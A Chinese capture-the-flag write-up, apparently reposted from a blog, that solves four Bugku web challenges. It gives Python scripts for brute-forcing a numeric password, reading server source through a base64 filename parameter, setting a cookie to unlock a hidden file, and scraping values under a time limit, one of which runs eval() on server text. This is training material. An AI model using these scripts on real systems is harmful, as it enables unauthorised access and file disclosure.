————恢复内容开始————
1.bugku-好像需要密码
POST /?yes HTTP/1.1 Host: 114.67.175.224:11711 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 9 Origin: http://114.67.175.224:11711 Connection: close Referer: http://114.67.175.224:11711/?yes Upgrade-Insecure-Requests: 1 pwd=12345
import requests import sys from multiprocessing.dummy import Pool def run(i): myobj = {'pwd': i} print("正在测试:") print(i) x = requests.post('http://114.67.175.224:11711/?yes', data = myobj) if 'flag' in x.text: print('正确的密码为:') print(i) sys.exit(i) return i else: return 0 num=[] for i in range(10000,99999): num.append(i) pool=Pool(5)#5进程 result = pool.map(run,num)
不比burpsuite快多少
2.bugku-cookies
?line=&filename=a2V5cy50eHQ=
a2V5cy50eHQ=解密为keys.txt,且line=0时回显,1,2,3都不回显
则http://114.67.175.224:19757/index.php?line=0&filename=aW5kZXgucGhw查看index.php文件第一行
脚本解决(因为网页简单故省略正则)
import requests import string import re with open('source.txt','w', encoding='UTF-8') as f: for i in range(0,50): payload = "http://114.67.175.224:19757/index.php?line=" + str(i) +"&filename=aW5kZXgucGhw" x=requests.get(payload) m=x.content.decode() f.write(m)
<php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); $file_list = array( '0' =>'keys.txt', '1' =>'index.php', ); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ $file_list[2]='keys.php'; } if(in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; ?>
分析后端源码的意思:
if(isset($_COOKIE[‘margin’]) && $_COOKIE[‘margin’]==‘margin’){
$fa = file($file);
查看keys.php发现flag
3.秋名山车神
亲请在2s内计算老司机的车速是多少
1796186889-862621952+1300107080*389498425-1547181833*503077495*1253024600-62338025-1112840463-2086718810-2041304337=?;
import re import requests url="http://114.67.175.224:16740/" s=requests.session() text=s.get(url).text fun = re.search('<div>(.*?)=',text, re.S).group(1) num=eval(fun) key={'value':num} flag=s.post(url,data=key) print(flag.text)
注意利用了eval字符转换的特性,num值会因session改变
其他都是爬虫基础
4.速度要快
响应包
HTTP/1.1 200 OK
Date: Sat, 25 Jun 2022 16:32:09 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=sohpph0agi7uj9stbgigar00m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTVRFM056azM=
Vary: Accept-Encoding
Content-Length: 89
Connection: close
Content-Type: text/html;charset=utf-8
</br>ææè§ä½ å¾å¿«ç¹!!!<!– OK ,now you have to post the margin what you find –>
第一次解密
跑的还不错,给你flag吧: MTE3Nzk3
第二次解密
117797
import requests import base64 import re s = requests.session() #建立会话 url = "http://114.67.175.224:16031/" head = s.get(url).headers #返回字典 result = head['flag'] result = base64.b64decode(result).decode('utf-8') #第一次解码 result = re.findall('(/w*)', result,re.S) result = base64.b64decode(result[5]).decode('utf-8') #第二次解码 payload = {'margin': result} print(s.post(url, data=payload).text)
与3类似,正则是凑出来的…将就看吧
原创文章,作者:,如若转载,请注明出处:https://blog.ytso.com/273001.html